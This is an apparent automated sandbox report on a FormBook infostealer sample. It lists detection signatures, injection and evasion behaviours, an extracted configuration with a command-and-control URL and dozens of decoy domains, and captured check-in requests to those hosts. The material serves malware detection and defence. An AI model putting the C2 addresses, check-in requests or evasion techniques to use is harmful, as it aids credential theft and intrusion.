Analysis Report YNzE2QUkvaTK7kd.exe

Overview

General Information

Sample Name: YNzE2QUkvaTK7kd.exe
Analysis ID: 385317
MD5: 52322f04ee7e74ed0dee03b54dbb2b14
SHA1: 8689cd483e8cc3ff397004f993c567161c4d3c41
SHA256: ef885d515b4d6e1bcbd650edf17a089b6c7d5f36fcadfe65491cea49f0f53b91
Tags: Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.smarttel.management/msc/"], "decoy": ["vanwertfamilyhealth.com", "amiawke.com", "hq-leaks.net", "playersgolfworld.info", "atlantaoffshore.com", "redstateaf.com", "leosquad.world", "elchtec.com", "mjshenanigans.com", "rbsccj.com", "360healthy.life", "sympa.digital", "afrotresor.com", "amazingliberty.com", "realsults.com", "preethamgudichuttu.com", "anastasiavegilates.com", "blockchainfest.asia", "viaverdeproject.net", "shouryashukla.com", "african-elephant.com", "factorysale.online", "vqxxmrxhpsho.mobi", "munchstaging.com", "codealemayohabrha.com", "melrosecakecompany.com", "themaskamigo.com", "aviatop.online", "coivdanswers.com", "geralouittane.com", "amazonshack.com", "aeguana.info", "samaalkaleej.com", "disruptorgen.com", "crystalcpv.com", "lsertsex.com", "affiliatesupersummit.com", "tintuc-247.info", "balakawu.com", "smartecomall.com", "chorahouses.com", "bellezaorganica.club", "greenbayhemorrhoidcenter.com", "iklanlaskar.com", "oldtownbusinessdistrict.com", "hindmetalhouse.com", "diligentpom.com", "genetic-web.com", "novergi.com", "sincetimebegan.com", "foodyfie.com", "wfiboostrs.com", "startuphrs.com", "vkjuzcsh.icu", "primarewards.net", "snappygarden.com", "rangerpoint.net", "meramission.com", "adsatadvanstar.com", "railrockers.com", "smartlightinggreenidea.com", "streetsmartlove.net", "shnfxj.com", "sms-master.online"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\VVhTSSmjNa.exe ReversingLabs: Detection: 29%
Multi AV Scanner detection for submitted file
Source: YNzE2QUkvaTK7kd.exe ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\VVhTSSmjNa.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: YNzE2QUkvaTK7kd.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: YNzE2QUkvaTK7kd.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: YNzE2QUkvaTK7kd.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb source: RegSvcs.exe, 00000006.00000002.701409870.00000000017B0000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL source: RegSvcs.exe, 00000006.00000002.701409870.00000000017B0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.922844395.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: ipconfig.exe, 00000009.00000002.911484763.00000000009A0000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.701470628.00000000017C0000.00000040.00000001.sdmp, ipconfig.exe, 00000009.00000002.912250730.00000000033C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, ipconfig.exe
Source: Binary string: RegSvcs.pdb source: ipconfig.exe, 00000009.00000002.911484763.00000000009A0000.00000004.00000020.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.922844395.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_05238720
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_05239480
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_05239490
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_05238712
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_05238854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi 6_2_00416CA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi 6_2_00417D70
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 9_2_02E16CA2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 9_2_02E17D70

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 103.120.82.56:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 103.120.82.56:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 103.120.82.56:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.smarttel.management/msc/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /msc/?2d=Yn6xWrc8&6lXXDHeh=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pKH+jHoocxko HTTP/1.1Host: www.realsults.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /msc/?2d=Yn6xWrc8&6lXXDHeh=Vmyb2+dBHu0Fxfg/5qCzMPkyVQF1W5lD3/EJu1ZP6IBNOOXVlqQnUzqXVgG8rpdGNrLT HTTP/1.1Host: www.wfiboostrs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic HTTP traffic detected: GET /msc/?2d=Yn6xWrc8&6lXXDHeh=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pKH+jHoocxko HTTP/1.1Host: www.realsults.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /msc/?2d=Yn6xWrc8&6lXXDHeh=Vmyb2+dBHu0Fxfg/5qCzMPkyVQF1W5lD3/EJu1ZP6IBNOOXVlqQnUzqXVgG8rpdGNrLT HTTP/1.1Host: www.wfiboostrs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.realsults.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Mon, 12 Apr 2021 08:14:17 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 
74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 7
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666101790.00000000031B1000.00000004.00000001.sdmp, YNzE2QUkvaTK7kd.exe, 00000000.00000002.666202347.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666202347.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
Source: explorer.exe, 00000007.00000002.913212025.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648987814.000000000628D000.00000004.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html(
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.665267575.0000000006250000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.650917361.000000000628D000.00000004.00000001.sdmp, YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.665267575.0000000006250000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com4
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.665267575.0000000006250000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comlvfet
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.646162179.000000000190C000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com%
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.646162179.000000000190C000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comp
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.646162179.000000000190C000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comt
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.653148237.0000000006264000.00000004.00000001.sdmp, YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648913234.000000000625B000.00000004.00000001.sdmp, YNzE2QUkvaTK7kd.exe, 00000000.00000003.648827768.000000000625D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648644780.0000000006253000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp//r
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648913234.000000000625B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/4
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648913234.000000000625B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648727005.000000000625D000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-s
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648913234.000000000625B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648913234.000000000625B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/n
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648827768.000000000625D000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/n
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.648913234.000000000625B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/u
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.649060879.000000000628D000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.comp
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.647753850.0000000006264000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comc
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.672936551.0000000007462000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.687141198.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419D60 NtCreateFile, 6_2_00419D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419E10 NtReadFile, 6_2_00419E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419E90 NtClose, 6_2_00419E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419F40 NtAllocateVirtualMemory, 6_2_00419F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419D5A NtCreateFile, 6_2_00419D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419E0A NtReadFile, 6_2_00419E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00419F3A NtAllocateVirtualMemory, 6_2_00419F3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018299A0 NtCreateSection,LdrInitializeThunk, 6_2_018299A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_01829910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018298F0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_018298F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829840 NtDelayExecution,LdrInitializeThunk, 6_2_01829840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_01829860
